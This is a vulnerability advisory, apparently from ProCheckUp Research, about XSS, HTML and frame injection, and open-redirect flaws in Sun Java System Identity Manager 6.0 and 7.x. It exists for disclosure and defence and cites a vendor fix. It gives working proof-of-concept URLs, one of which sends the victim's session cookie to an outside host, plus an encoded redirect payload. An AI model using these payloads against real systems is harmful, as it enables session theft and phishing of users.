|
|
|
|
| |
"Identity Manager allows customers to automate the process of creating, updating, and deleting user accounts across multiple IT systems. Collectively, this process is known as provisioning (e.g., creating, updating) and deprovisioning (e.g., deleting). For example, when a new employee joins a company, Identity Manager will automatically run a workflow retrieving the necessary approvals to grant the new employee access. Once these approvals are obtained, Identity Manager will automatically create user accounts allowing the new employee to do his or her job. This may include creating the user account for the new employee in the company's HR systems (PeopleSoft), giving him or her access to ERP applications (SAP) and/or creating an email account (Microsoft Exchange). If the employee changes roles in the company, Identity Manager will update the user account and provide access to the necessary resources required in that new role. When an employee leaves the company, Identity Manager automatically removes his or her user accounts to prevent access. By using Identity Manager, the entire provisioning and deprovisioning process can be automated--saving the customer both time and money."
The following issues have been found:
* HTML injection via the "cntry" parameter
* XSS via the "lang" parameter
* XSS via the "resultsForm" parameter
* XSS via the "activeControl" parameter
* Frame injection via the "helpUrl"
* Cross-domain redirects within the "nextPage" parameter |
| |
Credit:
The information has been provided by ProCheckUp Research.
More information: http://www.procheckup.com/Vulnerability_PR07-06.php, http://www.procheckup.com/Vulnerability_PR07-07.php
http://www.procheckup.com/Vulnerability_PR07-08.php, http://www.procheckup.com/Vulnerability_PR07-09.php
http://www.procheckup.com/Vulnerability_PR07-10.php or http://www.procheckup.com/Vulnerability_PR07-12.php
|
| |
Vulnerable Systems:
* Sun Java System Identity Manager version 6.0 (20061212 SP 2)
* Sun Java System Identity Manager version 7.0
* Sun Java System Identity Manager version 7.1
XSS on Sun Java System Identity Manager 6.0/7.x login page "lang"
Sun Java System Identity Manager login page is vulnerable to XSS within the "lang" parameter processed by the "/idm/login.jsp" server-side script.
Proof of concept (PoC):
The provided PoC URL forwards the victim user's cookie to a third-party site (procheckup.com in this case).
https://target.tld/idm/login.jsp?lang=--><script>window.location="http://procheckup.com/?"+document.cookie
</script><!--&cntry=
Injected payload:
--><script>window.location="http://procheckup.com/?"+document.cookie</script><!--
XSS on Sun Java System Identity Manager 6.0/7.x "resultsForm" parameter
Sun Java System Identity Manager is vulnerable to XSS within the "resultsForm" parameter processed by the "/idm/account/findForSelect.jsp" server-side script.
Proof of concept (PoC):
The provided PoC URL inserts an alert box to simply prove that it's possible to run scripting code within the context of the target domain.
https://target.tld/idm/account/findForSelect.jsp?resultsForm=<script>alert('Running_scripting_within_the_
context_of_'%2bdocument.domain)</script>&predefinedQuery=name%3Astarts+with%3A%25
Injected payload:
<script>alert('Running_scripting_within_the_context_of_'%2bdocument.domain)</script>
XSS on Sun Java System Identity Manager 6.0/7.x "activeControl" parameter
Sun Java System Identity Manager is vulnerable to XSS within the "activeControl" parameter processed by the "/idm/user/main.jsp" server-side script.
Proof of concept (PoC):
The provided PoC URL inserts an alert box to simply prove that it's possible to run scripting code within the context of the target domain.
https://target.tld/idm/user/main.jsp?activeControl=";</script><script>alert('Running_scripting_within_the_
context_of_'%2bdocument.domain)</script>
Injected payload:
";</script><script>alert('Running_scripting_within_the_context_of_'%2bdocument.domain)</script>
Frame Injection on Sun Java System Identity Manager 6.0/7.x "helpUrl" parameter
Sun Java System Identity Manager is vulnerable to frame injection within the "helpUrl" parameter processed by the "/idm/help/index.jsp" server-side script.
Proof of concept (PoC):
The provided PoC URLs embed a third-party site (www.procheckup.com in this case):
https://target.tld/idm/help/index.jsp?helpUrl=//www.procheckup.com
https://target.tld/idm/help/index.jsp?helpUrl=http://www.procheckup.com
Cross-domain redirect on Sun Java System Identity Manager 6.0/7.x
Sun Java System Identity Manager is vulnerable to cross-domain redirects within the "nextPage" parameter processed by the "/idm/user/login.jsp" server-side script.
Proof of concept (PoC):
The provided PoC URLs redirect users to a third-party site (procheckup.com in this case) after a successful logon:
https://target.tld/idm/user/login.jsp?nextPage=http://procheckup.com
https://target.tld/idm/user/login.jsp?nextPage=http://%70%72%6f%63%68%65%63%6b%75%70%2e%63
%6f%6d
Consequences:
- An attacker may be able to inject malicious HTML or scripting code in the browser of a user who clicks on a link to Sun Java System Identity Manager. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information to unauthorised third parties.
- An attacker may inject frames that embed third-party sites, which can help launching phishing attacks by injecting a frame that points to a "spoof" login page. Non-persistent defacement of the target site is also possible.
- An attacker can redirect victim users to third-party sites after a successful logon. Such behaviour can help attackers perform phishing attacks.
Fix:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-103180-1
|
|
|
|
|
|
|
|
|
|
